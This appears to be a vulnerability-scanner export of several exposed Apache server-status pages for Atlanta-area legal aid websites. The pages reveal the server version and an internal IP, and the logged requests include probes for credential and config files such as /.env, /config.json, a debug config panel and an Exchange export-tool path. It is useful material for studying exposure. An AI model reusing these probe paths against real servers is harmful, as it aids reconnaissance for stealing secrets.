HTTP/1.0 48-53-0/0/567. 2.124358800.00.007.60 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 49-53-0/0/377. 0.004402300.00.004.76 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 50-53-0/0/647. 0.674401500.00.009.97 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 51-53-0/0/510. 0.524397400.00.007.65 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 52-53-0/0/483. 0.064401400.00.006.08 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 53-53-0/0/401. 0.534400400.00.009.95 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 54-53-0/0/521. 0.004402200.00.008.69 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 55-53-0/0/459. 0.104397300.00.004.78 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 56-53-0/0/707. 11.543940500.00.0013.23 ::1
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3124f627ed24f627edd6fe0d98
Apache Status Apache Server Status for www.legalaidconnections.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Wednesday, 14-Jun-2023 12:07:17 UTC Restart Time: Friday, 21-Apr-2023 15:43:58 UTC Parent Server Config. Generation: 55 Parent Server MPM Generation: 54 Server uptime: 53 days 20 hours 23 minutes 18 seconds Server load: 0.00 0.00 0.00 Total accesses: 683686 - Total Traffic: 11.9 GB CPU Usage: u194.38 s25.27 cu0 cs0 - .00472% CPU load .147 requests/sec - 2736 B/second - 18.2 kB/request 9 requests currently being processed, 2 idle workers KK_K_...WK.KK..KK............................................... ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-5426591/34/46285K 2.37001.70.29842.42 130.176.162.73http/1.1legalaidconnections.org:8080GET / HTTP/1.1 1-5411863/607/47778K 18.06003.96.44911.88 70.132.4.67http/1.1legalaidconnections.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 2-5444970/0/46265_ 17.19000.00.00821.35 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 3-5444401/5/43080K 0.06001.60.11757.51 70.132.4.67http/1.1legalaidconnections.org:8080GET / HTTP/1.1 4-548240/687/44086_ 21.0011500.010.20711.05 130.176.162.73http/1.1gwinnettfamilylawclinic.org:808GET / HTTP/1.1 5-54-0/0/42771. 0.0026000.00.00734.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 6-54-0/0/39632. 0.0025900.00.00755.51 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 7-54-0/0/39738. 0.0025800.00.00751.18 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 8-548350/579/35389W 20.57000.06.76728.32 70.132.4.67http/1.1legalaidconnections.org:8080GET /server-status HTTP/1.1 9-5443641/14/33646K 1.10001.60.19596.38 130.176.137.155http/1.1legalaidconnections.org:8080GET / HTTP/1.1 10-54-0/0/33433. 0.0025700.00.00604.11 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 11-5443704/14/26459K 0.14005.90.05474.24 70.132.4.67http/1.1legalaidconnections.org:8080GET / HTTP/1.1 12-5443884/15/24616K 1.04006.30.13458.09 70.132.4.67http/1.1legalaidconnections.org:8080GET / HTTP/1.1 13-54-0/0/21498. 0.0025600.00.00346.21 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 14-54-0/0/17702. 0.0025500.00.00280.93 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 15-5444031/11/16485K 0.90001.60.12333.73 70.132.4.67http/1.1legalaidconnections.org:8080GET / HTTP/1.1 16-5444744/6/14500K 0.04005.40.02217.40 70.132.4.67http/1.1legalaidconnections.org:8080GET / HTTP/1.1 17-53-0/0/9678. 0.002466800.00.00127.87 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 18-53-0/0/8638. 0.002466700.00.00103.94 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 19-53-0/0/6575. 0.002466600.00.00121.76 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 20-53-0/0/6778. 0.002466500.00.00100.31 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 21-53-0/0/5242. 0.002466400.00.00102.53 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 22-53-0/0/6968. 0.002466200.00.0095.28 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 23-53-0/0/5115. 0.002466300.00.00105.75 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 24-53-0/0/5190. 0.003539500.00.0058.62 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 25-53-0/0/2585. 2.392933500.00.0053.57 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 26-53-0/0/2918. 0.063501800.00.0072.86 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 27-53-0/0/2335. 0.273501700.00.0051.92 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 28-53-0/0/2238. 0.003541900.00.0041.95 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 29-53-0/0/2170. 2.373043600.00.0049.42 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 30-53-0/0/2043. 4.302465900.00.0032.28 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 31-53-0/0/1904. 0.583411100.00.0029.95 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 32-53-0/0/1827. 0.003541800.00.0050.62 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 33-53-0/0/2905. 0.003541700.00.0055.71 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 34-53-0/0/1957. 0.003541500.00.0026.29 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 35-53-0/0/1427. 0.003541600.00.0023.36 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 36-53-0/0/1631. 0.903411200.00.0039.39 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 37-53-0/0/2063. 0.553380000.00.0025.75 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 38-53-0/0/1396. 0.003541400.00.0021.58 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 39-53-0/0/1467. 0.003541300.00.0023.65 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 40-53-0/0/1383. 0.003541200.00.0018.03 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 41-53-0/0/555. 0.004402200.00.0011.27 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 42-53-0/0/543. 0.064401400.00.009.26 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 43-53-0/0/748. 0.164395400.00.009.21 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 44-53-0/0/658. 0.064400700.00.006.80 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 45-53-0/0/870. 0.064400400.00.0014.25 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 46-53-0/0/548. 0.014399700.00.007.24 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 47-53-0/0/500. 0.054400100.00.006.27 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 48-53-0/0/567. 2.124358400.00.007.60 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 49-53-0/0/377. 0.004401800.00.004.76 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 50-53-0/0/647. 0.674401000.00.009.97 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 51-53-0/0/510. 0.524396900.00.007.65 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 52-53-0/0/483. 0.064400900.00.006.08 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 53-53-0/0/401. 0.534399900.00.009.95 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 54-53-0/0/521. 0.004401700.00.008.69 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 55-53-0/0/459. 0.104396800.00.004.78 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 56-53-0/0/707. 11.543940000.00.0013.23 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 57-53-0/0/206. 0.254395300.00.00
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3124f627ed24f627edc68b0260
Apache Status Apache Server Status for www.legalaidconnections.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-01-31T14:01:53 Current Time: Tuesday, 14-Feb-2023 05:24:17 UTC Restart Time: Thursday, 02-Feb-2023 06:52:49 UTC Parent Server Config. Generation: 12 Parent Server MPM Generation: 11 Server uptime: 11 days 22 hours 31 minutes 27 seconds Server load: 23.56 21.69 20.82 Total accesses: 648347 - Total Traffic: 29.0 GB CPU Usage: u226.39 s14.54 cu0 cs0 - .0234% CPU load .629 requests/sec - 29.4 kB/second - 46.8 kB/request 19 requests currently being processed, 0 idle workers KK.KK.....K..K....K.....K......K.............K....K.......K..... .....K....W...K.KK..K....K...................................... ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-11292903/60/35501K 18.49003.31.911662.84 70.132.63.132http/1.1legalaidconnections.org:8080GET /debug/default/view?panel=config HTTP/1.1 1-11311701/1/35707K 0.030531.60.001621.73 70.132.63.86http/1.1legalaidconnections.org:8080GET / HTTP/1.1 2-11-0/0/26654. 12.234300.00.001299.09 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 3-1162134/13/27066K 0.90105.40.381365.62 70.132.63.132http/1.1legalaidconnections.org:8080GET / HTTP/1.1 4-11118028/48/32107K 19.910011.01.761471.19 70.132.63.132http/1.1legalaidconnections.org:8080GET /telescope/requests HTTP/1.1 5-11-0/0/24140. 18.281200.00.001148.88 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 6-11-0/0/30659. 26.156400.00.001390.16 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 7-11-0/0/23048. 10.71100.00.001136.48 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 8-11-0/0/28719. 16.291900.00.001364.98 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 9-11-0/0/21067. 0.486200.00.001040.69 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 10-1166951/18/19514K 9.17111.10.97911.59 70.132.63.86http/1.1legalaidconnections.org:8080GET /api/search?folderIds=0 HTTP/1.1 11-11-0/0/18989. 0.522200.00.00907.71 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 12-11-0/0/18143. 0.391800.00.00913.89 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 13-11131963/8/17082K 1.46007.30.07876.21 70.132.63.132http/1.1legalaidconnections.org:8080GET /.env HTTP/1.1 14-11-0/0/21875. 0.317400.00.00969.17 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 15-11-0/0/14935. 0.81600.00.00762.58 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 16-11-0/0/19256. 0.613400.00.00896.18 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 17-11-0/0/17412. 0.571000.00.00844.89 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 18-1177947/12/11536K 0.800010.40.60557.70 70.132.63.132http/1.1legalaidconnections.org:8080GET / HTTP/1.1 19-11-0/0/16492. 0.54800.00.00763.48 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 20-11-0/0/16664. 0.82700.00.00679.03 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 21-11-0/0/11001. 0.612100.00.00534.55 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 22-11-0/0/14239. 0.445700.00.00606.38 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 23-11-0/0/13816. 0.494800.00.00567.31 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 24-11300321/56/12223K 21.14101.12.32563.11 70.132.63.86http/1.1legalaidconnections.org:8080GET /s/6323e2938313e2432323e23313/_/;/META-INF/maven/com.atlass 25-11-0/0/8199. 0.64300.00.00357.20 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 26-11-0/0/8613. 0.631100.00.00361.01 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 27-11-0/0/7591. 0.832900.00.00281.31 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 28-11-0/0/7304. 0.824400.00.00276.24 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 29-11-0/0/3751. 0.472300.00.00180.67 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 30-11-0/0/6333. 0.564200.00.00263.35 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 31-1183481/8/3300K 0.84101.60.18140.89 15.158.41.205http/1.1legalaidconnections.org:8080GET / HTTP/1.1 32-11-0/0/6244. 0.531500.00.00255.40 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 33-11-0/0/7385. 0.662800.00.00312.36 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 34-11-0/0/3656. 4.485400.00.00153.01 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 35-11-0/0/6095. 0.556100.00.00223.03 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 36-11-0/0/3427. 0.437600.00.00182.04 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 37-11-0/0/3156. 0.412400.00.00121.24 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 38-11-0/0/5555. 0.393800.00.00238.32 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 39-11-0/0/5462. 0.352000.00.00210.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 40-11-0/0/5792. 0.336700.00.00296.05 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 41-11-0/0/3635. 0.253100.00.00118.29 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 42-11-0/0/1790. 0.337100.00.0057.56 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 43-11-0/0/2060. 0.232500.00.0052.34 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 44-11-0/0/1589. 0.165500.00.0049.64 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 45-11142673/5/1846K 0.88003.30.0163.37 70.132.63.132http/1.1legalaidconnections.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 46-11-0/0/1465. 0.195100.00.0046.42 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 47-11-0/0/1141. 0.292600.00.0029.96 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 48-11-0/0/1135. 0.387200.00.0027.43 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 49-11-0/0/928. 0.433500.00.0043.78 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 50-11145257/9/1417K 0.340010.30.0348.70 70.132.63.132http/1.1legalaidconnections.org:8080GET / HTTP/1.1 51-11-0/0/1333. 0.307800.00.0041.74 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 52-11-0/0/914. 0.257300.00.0022.16 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 53-11-0/0/1080. 0.306500.00.0043.43 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 54-11-0/0/1061. 0.192700.00.0047.95 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 55-11-0/0/1125. 0.151600.00.0036.68 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 56-11-0/0/1034. 0.241700.00.0040.16 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 57-11-
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3124f627ed24f627ed45adf2ce
Apache Status Apache Server Status for www.legalaidconnections.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-01-31T14:01:53 Current Time: Tuesday, 14-Feb-2023 05:24:18 UTC Restart Time: Thursday, 02-Feb-2023 06:52:49 UTC Parent Server Config. Generation: 12 Parent Server MPM Generation: 11 Server uptime: 11 days 22 hours 31 minutes 28 seconds Server load: 23.56 21.69 20.82 Total accesses: 648357 - Total Traffic: 29.0 GB CPU Usage: u197.5 s12.95 cu0 cs0 - .0204% CPU load .629 requests/sec - 29.4 kB/second - 46.8 kB/request 21 requests currently being processed, 0 idle workers KKKKKK....K..K....K.....K......K.............K....K.......K..... .....K....K...K.KW..W....K...................................... ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-11292903/60/35501K 18.49003.31.911662.84 70.132.63.132http/1.1legalaidconnections.org:8080GET /debug/default/view?panel=config HTTP/1.1 1-11311701/1/35707K 0.031531.60.001621.73 70.132.63.86http/1.1legalaidconnections.org:8080GET / HTTP/1.1 2-11317591/1/26655K 0.010421.10.001299.09 70.132.63.132http/1.1legalaidconnections.org:8080GET /info.php HTTP/1.1 3-1162135/14/27067K 0.90006.50.381365.62 70.132.63.132http/1.1legalaidconnections.org:8080GET /about HTTP/1.1 4-11118029/49/32108K 19.910012.11.761471.19 70.132.63.132http/1.1legalaidconnections.org:8080GET /.DS_Store HTTP/1.1 5-11317601/1/24141K 0.00001.10.001148.88 70.132.63.165http/1.1legalaidconnections.org:8080GET /config.json HTTP/1.1 6-11-0/0/30659. 26.156400.00.001390.16 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 7-11-0/0/23048. 10.71200.00.001136.48 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 8-11-0/0/28719. 16.292000.00.001364.98 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 9-11-0/0/21067. 0.486200.00.001040.69 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 10-1166951/18/19514K 9.17211.10.97911.59 70.132.63.86http/1.1legalaidconnections.org:8080GET /api/search?folderIds=0 HTTP/1.1 11-11-0/0/18989. 0.522300.00.00907.71 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 12-11-0/0/18143. 0.391900.00.00913.89 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 13-11131963/8/17082K 1.46007.30.07876.21 70.132.63.132http/1.1legalaidconnections.org:8080GET /.env HTTP/1.1 14-11-0/0/21875. 0.317400.00.00969.17 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 15-11-0/0/14935. 0.81700.00.00762.58 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 16-11-0/0/19256. 0.613400.00.00896.18 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 17-11-0/0/17412. 0.571100.00.00844.89 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 18-1177948/13/11537K 0.820011.50.60557.70 70.132.63.132http/1.1legalaidconnections.org:8080GET /api/search?folderIds=0 HTTP/1.1 19-11-0/0/16492. 0.54900.00.00763.48 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 20-11-0/0/16664. 0.82800.00.00679.03 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 21-11-0/0/11001. 0.612200.00.00534.55 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 22-11-0/0/14239. 0.445700.00.00606.38 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 23-11-0/0/13816. 0.494800.00.00567.31 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 24-11300321/56/12223K 21.14101.12.32563.11 70.132.63.86http/1.1legalaidconnections.org:8080GET /s/6323e2938313e2432323e23313/_/;/META-INF/maven/com.atlass 25-11-0/0/8199. 0.64400.00.00357.20 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 26-11-0/0/8613. 0.631200.00.00361.01 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 27-11-0/0/7591. 0.833000.00.00281.31 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 28-11-0/0/7304. 0.824400.00.00276.24 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 29-11-0/0/3751. 0.472400.00.00180.67 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 30-11-0/0/6333. 0.564200.00.00263.35 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 31-1183481/8/3300K 0.84201.60.18140.89 15.158.41.205http/1.1legalaidconnections.org:8080GET / HTTP/1.1 32-11-0/0/6244. 0.531600.00.00255.40 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 33-11-0/0/7385. 0.662900.00.00312.36 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 34-11-0/0/3656. 4.485400.00.00153.01 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 35-11-0/0/6095. 0.556100.00.00223.03 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 36-11-0/0/3427. 0.437600.00.00182.04 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 37-11-0/0/3156. 0.412500.00.00121.24 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 38-11-0/0/5555. 0.393800.00.00238.32 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 39-11-0/0/5462. 0.352100.00.00210.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 40-11-0/0/5792. 0.336700.00.00296.05 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 41-11-0/0/3635. 0.253200.00.00118.29 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 42-11-0/0/1790. 0.337100.00.0057.56 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 43-11-0/0/2060. 0.232600.00.0052.34 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 44-11-0/0/1589. 0.165500.00.0049.64 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 45-11142673/5/1846K 0.88003.30.0163.37 70.132.63.132http/1.1legalaidconnections.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 46-11-0/0/1465. 0.195100.00.0046.42 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 47-11-0/0/1141. 0.292700.00.0029.96 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 48-11-0/0/1135. 0.387200.00.0027.43 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 49-11-0/0/928. 0.433500.00.0043.78 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 50-11145258/10/1418K 0.340011.40.0348.70 70.132.63.132http/1.1legalaidconnections.org:8080GET /v2/_catalog HTTP/1.1 51-11-0/0/1333. 0.307900.00.0041.74 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 52-11-0/0/914. 0.257300.00.0022.16 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 53-11-0/0/1080. 0.306500.00.0043.43 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 54-11-0/0/1061. 0.192800.00.0047.95 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 55-11-0/0/1125. 0.151700.00.0036.68 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 56-11-0/0/1034. 0.241800.00.0040.16 ::1http/1.1atlantalegalaid.org:8
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3124f627ed24f627ed9791cf0e
Apache Status Apache Server Status for www.legalaidconnections.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-01-31T14:01:53 Current Time: Tuesday, 14-Feb-2023 05:24:15 UTC Restart Time: Thursday, 02-Feb-2023 06:52:49 UTC Parent Server Config. Generation: 12 Parent Server MPM Generation: 11 Server uptime: 11 days 22 hours 31 minutes 25 seconds Server load: 23.56 21.69 20.82 Total accesses: 648306 - Total Traffic: 29.0 GB CPU Usage: u240.31 s15.29 cu0 cs0 - .0248% CPU load .629 requests/sec - 29.4 kB/second - 46.8 kB/request 14 requests currently being processed, 4 idle workers K..KK....._..W....K....._......K.............K....K.......K..... .....K...._...W.KK..K...._...................................... ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process <SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-11292901/58/35499K 18.49001.11.911662.84 70.132.63.132http/1.1legalaidconnections.org:8080GET /info.php HTTP/1.1 1-11-0/0/35706. 15.477313620.00.001621.73 70.132.63.132http/1.1gwinnettfamilylawclinic.org:808GET /v2/_catalog HTTP/1.1 2-11-0/0/26654. 12.234100.00.001299.09 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 3-1162132/11/27064K 0.90002.70.381365.62 70.132.63.132http/1.1legalaidconnections.org:8080GET /debug/default/view?panel=config HTTP/1.1 4-11118024/44/32103K 19.90005.61.761471.18 70.132.63.132http/1.1legalaidconnections.org:8080GET /config.json HTTP/1.1 5-11-0/0/24140. 18.281100.00.001148.88 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 6-11-0/0/30659. 26.156200.00.001390.16 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 7-11-0/0/23048. 10.71000.00.001136.48 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 8-11-0/0/28719. 16.291800.00.001364.98 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 9-11-0/0/21067. 0.486000.00.001040.69 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 10-1166950/17/19513_ 9.173233960.00.97911.59 15.158.41.205http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 11-11-0/0/18989. 0.522100.00.00907.71 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 12-11-0/0/18143. 0.391700.00.00913.89 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 13-11131960/5/17079W 1.46000.00.06876.20 70.132.63.132http/1.1legalaidconnections.org:8080GET /server-status HTTP/1.1 14-11-0/0/21875. 0.317200.00.00969.17 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 15-11-0/0/14935. 0.81500.00.00762.58 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 16-11-0/0/19256. 0.613200.00.00896.18 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 17-11-0/0/17412. 0.57900.00.00844.89 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 18-1177944/9/11533K 0.80005.90.60557.70 70.132.63.132http/1.1legalaidconnections.org:8080GET /about HTTP/1.1 19-11-0/0/16492. 0.54700.00.00763.48 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 20-11-0/0/16664. 0.82600.00.00679.03 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 21-11-0/0/11001. 0.612000.00.00534.55 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 22-11-0/0/14239. 0.445500.00.00606.38 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 23-11-0/0/13816. 0.494600.00.00567.31 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 24-11300320/55/12222_ 21.141913500.02.32563.11 